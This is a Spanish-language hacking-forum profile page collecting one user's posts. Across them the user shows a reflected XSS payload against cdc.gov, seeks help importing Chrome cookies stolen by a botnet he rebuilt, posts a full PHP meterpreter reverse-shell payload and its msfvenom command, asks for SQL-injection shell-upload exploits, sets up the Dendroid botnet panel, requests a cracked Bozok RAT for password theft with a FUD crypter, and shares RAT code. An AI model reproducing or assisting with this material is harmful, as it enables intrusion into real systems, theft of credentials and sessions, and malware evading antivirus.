Mostrar Mensajes

Información del Perfil

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - cibi

Páginas1 2 3 ... 7

Hacking ShowOff / [XSS Reflejado] Centro para el Control y Prevención de Enfermedades cdc.gov

Agosto 19, 2020, 04:18:16 AM

Hola, hace unos meses en pleno confinamiento del coronavirus encontré un xss en el Centro para el Control y Prevención de Enfermedades de USA.

URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vulnerabilidad: XSS Reflejado
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<script>alert('Bug in governament')</script>
Autor: cibi / cibx
Reportado: NO, no tardaron ni 2 minutos en arreglar el bug.

Dudas y pedidos generales / Ayuda para importar cookies a navegador a través de archivo .sqlite

Agosto 10, 2020, 12:33:07 PM

Hola estuve mucho tiempo sin entrar al foro, pero he vuelto y necesito resolver una duda muy importante para un proyecto, la verdad modifique una botnet prácticamente de cero la deje como nueva y conecta perfectamente, estuve haciendo unas pruebas con mi pc y el panel y funciona, el problema que al probar la opción steal cookies chrome junto con otro amigo me genera un archivo que se llama CookieCh.sqlite entonces lo que me gustaría es exportar correctamente las cookies en json y importarla al navegador de alguna manera.
He probado este programa de código abierto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y puedo ver la cookie correctamente he probado otros programas también como DB Browser: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Puedo exportar correctamente la cookie.sqlite en json pero no se importa correctamente en el navegador. Alguien podría ayudarme ? He probado la extensión de google chrome edit this cookie y alguna otra mas para poder importarlo pero no se importa no me salen las cookies al importar...
Os dejo aquí el link del archivo con el que estoy trabajando:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias a ver quien puede ayudarme !

Dudas y pedidos generales / Ayuda para compilar apk con android studio

Agosto 16, 2016, 06:16:48 PM

Hola he decompilado una apk para modificar una parte de su código el problema que al seleccionar Build en el menu y luego selecciono el boton para que genere el apk en la parte final me pide que seleccione un archivo de configuración alguien puede ayudarme?

Exactamente me refiero a esto:

Que archivo tengo que seleccionar?

Si no lo selecciono me da este error:

Dudas y pedidos generales / Re:Ayuda subir shell php en una web con sql injection

Agosto 13, 2016, 07:27:48 AM

vale muchas gracias a todos investigare haber si consigo subir shell el problema que no se porque pero con sqlmap en segun que paginas me dice que no es vulnerable y con havij si lo es.

Dudas y pedidos generales / [SOLUCIONADO] Ayuda subir shell php en una web con sql injection

Agosto 12, 2016, 04:41:33 PM

Hola alguien conoce algun exploit para subir shell en una web que tenga sql injection?
O si hay alguna otra forma de hacerlo he visto algunas formas de hacerlo desde el navegador pero si alguien sabe de algún exploit se lo agradeceré.

Dudas y pedidos generales / Re:Ayuda: Conseguir sesión de meterpreter con un payload PHP fuera de red

Julio 28, 2016, 05:38:26 PM

Este es el codigo del exploit.php lo he probado tanto dentro de red como fuera de red:

Código: text

/*<?php /**/ error_reporting(0); $ip = '192.168.1.35'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

El problema que no me da la sesion de meterpreter y quiero infectar por url dentro de mi red o fuera de red he probado de quitar el comentario del principio /* y añadiendo al final : ?> pero tampoco conecta alguien puede ayudarme? Esto es posible? Hacer una intrusion de esta manera?

Al entrar al link me sale el mensaje: "no socket"

Dudas y pedidos generales / Ayuda: Conseguir sesión de meterpreter con un payload PHP fuera de red

Julio 20, 2016, 11:52:59 AM

Hola necesito ayuda para conseguir una sesion de meterpreter visitando una url atraves de un payload php por ejemplo yo genero el payload
php con el siguiente comando:
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP PUBLICA LPORT=4444 R > exploit.php
Tengo los puertos abiertos en el router 4444 subi el payload a un hosting free y utilize el exploit/multi/handler para esperar la conexion pero al entrar a la url al exploit.php se queda un rato cargando y me sale el siguiente mensaje:
no socket
Lo he probado varias veces pero no conecta y no recibo la sesion de meterpreter...
Alguien sabe que puede pasar?

Dudas y pedidos generales / Re:Como poner un estado y ciudad determinado en tor?

Febrero 16, 2016, 04:47:45 PM

si el pais ya se el problema es el estado y la ciudad es posible cambiar y escogerlo?

Dudas y pedidos generales / Como poner un estado y ciudad determinado en tor?

Febrero 16, 2016, 10:54:52 AM

Hola necesito que alguien me ayude.. Puedo poner el nodo del país que quiera en tor editando el archivo torrc pero lo que quiero es poner un estado y ciudad, el que yo quiera eso es posible?
Y si es así como podría cambiar el estado y ciudad ?

#10

Dudas y pedidos generales / Ayuda con la configuracion de la botnet dendroid

Agosto 22, 2015, 01:18:35 PM

Hola estoy configurando el panel de la botnet dendroid pero tengo un problema, lo estoy haciendo en localhost pero despues de crear la base de datos, el usuario y contraseña desde el phpmyadmin y relleno los datos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se redirige del archivo step1.php al index.php y tengo que rellenar los datos de nuevo...
No se que problema hay porque ya configure una vez la botnet y conseguí instalarla, la ultima vez solo me hizo falta modificar un archivo el reg.php para cambiar el host pero nada mas.
Alguien me puede ayudar porque pasa eso?

#11

Dudas y pedidos generales / Re:Ayuda pasar declaración de crypter vb6 a vb.net

Mayo 21, 2015, 10:28:32 AM

Muchas gracias!

#12

Dudas y pedidos generales / [SOLUCIONADO] Ayuda pasar declaración de crypter vb6 a vb.net

Mayo 20, 2015, 01:34:38 PM

Hola necesito ayuda estaba intentando pasar un crypter en vb6 a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y tengo problemas al pasar una declaración que es la siguiente:
Call FileCopy(App.Path & "\encrypt.dll", App.Path & "\Crypted.exe")
Como podría pasar eso a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login? el App.Path da error...

#13

Dudas y pedidos generales / Re:Duda sobre bozok rat

Mayo 03, 2015, 02:32:18 PM

es que no quiero pagar por otro crypter fud jajaja aunque si alguien me da alguno lo agradeceré...

#14

Dudas y pedidos generales / Re:Duda sobre bozok rat

Mayo 03, 2015, 06:15:06 AM

Es que he probado xtreme rat y muchos otros rats y resulta que el crypter que tengo solo puede encriptar servers de asta 300kb y aparte de eso según que server encripte de algún troyano me da error, he probados muchos rats y el único que me funciona con el crypter que tengo es el bozok..

#15

Dudas y pedidos generales / Re:Duda sobre bozok rat

Mayo 02, 2015, 05:41:48 PM

Si he probado unos cuantos pero al hacer clic derecho y poner get passwords dice de comprar.
Pide comprar en esa opción en todas las versiones o hay alguno que no lo pida?

#16

Dudas y pedidos generales / Duda sobre bozok rat

Mayo 02, 2015, 04:42:55 PM

Hola, necesito el bozok rat crackeado. Sé que está en este foro pero necesito que esté crackeado, porque cuando le doy clic derecho a get passwords para mostrar las contraseñas, me dice que compre la versión privada o algo así.

Necesito que alguien me lo consiga cracked, lo necesito urgente porque tengo un crypter fud y resulta que solo funciona con ese rat. Al encriptar y recibir la conexión, si pruebo con otros rats me da error...

Bueno a ver, si alguien puede ayudarme ...

#17

Dudas y pedidos generales / Duda sobre vulnerabilidades y auditorias

Abril 19, 2015, 11:32:51 AM

Hola tengo una duda es que hace un tiempo envié mi curriculum a una empresa de seguridad y al momento me respondieron y me preguntaron que software usaba para las auditorias y yo les dije una lista de todo lo que usaba para encontrar vulnerabilidades pero después de contestar y decirle todo lo que usaba no me volvieron a responder...
Por eso pensé que para buscar vulnerabilidades si trabajas para una empresa no se buscan vulnerabilidades mediante algún software como vega acunetix nexpose nikto o cualquier otro si no que se buscan manualmente, creo que por eso no me volvieron a responder. Puede ser por eso?
Ustedes que piensan?

#18

Dudas y pedidos generales / Re:Ayuda con escritorio remoto de mi rat vb.net

Abril 10, 2015, 04:10:31 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
F esta declarado en el formulario del escritorio remoto de esta manera:
Código: vbnet
Public F As Formwhiteshell2
Formwhiteshell2 es el formulario donde están los servers conectados
Claro, declarado, pero en ningún momento se inicializa... :/ De todos modos, poca experiencia tengo en VB, podría ser alguna otra cosa...
¿Alguien? xD

Saludos!
-fermino-

Sabes como puedo inicializarlo? También esta puesto en el formulario principal donde están los servers conectados en esta parte:

Código: vbnet

Case "@" ' i recive image  
                    Dim F As FormDesktop5 = My.Application.OpenForms("!" & sock)
                    If F IsNot Nothing Then
                        If a(1).Length = 1 Then
                            F.Text = "Remote Desktop  " & "Size: " & siz(b.Length) & " ,No Changes"
                            If F.Button1.Text = "Stop" Then
                                s.Send(sock, "@" & yy & F.C1.SelectedIndex & yy & F.C2.Text & yy & F.c.Value)
                            End If
                            Exit Sub
                        End If

Como he dicho utilice el troyano simple rat de referencia.

#19

Dudas y pedidos generales / Re:Ayuda con escritorio remoto de mi rat vb.net

Abril 10, 2015, 03:05:09 PM

F esta declarado en el formulario del escritorio remoto de esta manera:

Código: vbnet

Public F As Formwhiteshell2

Formwhiteshell2 es el formulario donde están los servers conectados

#20

Dudas y pedidos generales / Ayuda con escritorio remoto de mi rat vb.net

Abril 10, 2015, 02:51:35 PM

Hola hace tiempo estoy haciendo un rat en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login privado pero el primer modulo que hice no conectaban los sockets entonces decidí
copiar el código de un rat llamado simple rat tambien en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y lo agrege a mi proyecto, ahora si conecta bien el problema que cuando
le doy clic derecho para ver el escritorio remoto me da el siguiente error:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En el boton "Start" al darle clic da ese error el codigo es este:

Código: vbnet

Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click

        If Button1.Text = "Start" Then
            F.s.Send(sock, "@" & F.yy & C1.SelectedIndex & F.yy & C2.Text & F.yy & c.Value)
            Button1.Text = "Stop"
        Else
            Button1.Text = "Start"
        End If

    End Sub

Exactamente aquí:
F.s.Send(sock, "@" & F.yy & C1.SelectedIndex & F.yy & C2.Text & F.yy & c.Value)
Utilice de referencia el troyano simple rat alguien puede ayudarme ?
Por favor que algún moderador arregle el código y la imagen que al hacer el tema no me salían las opciones.

Páginas1 2 3 ... 7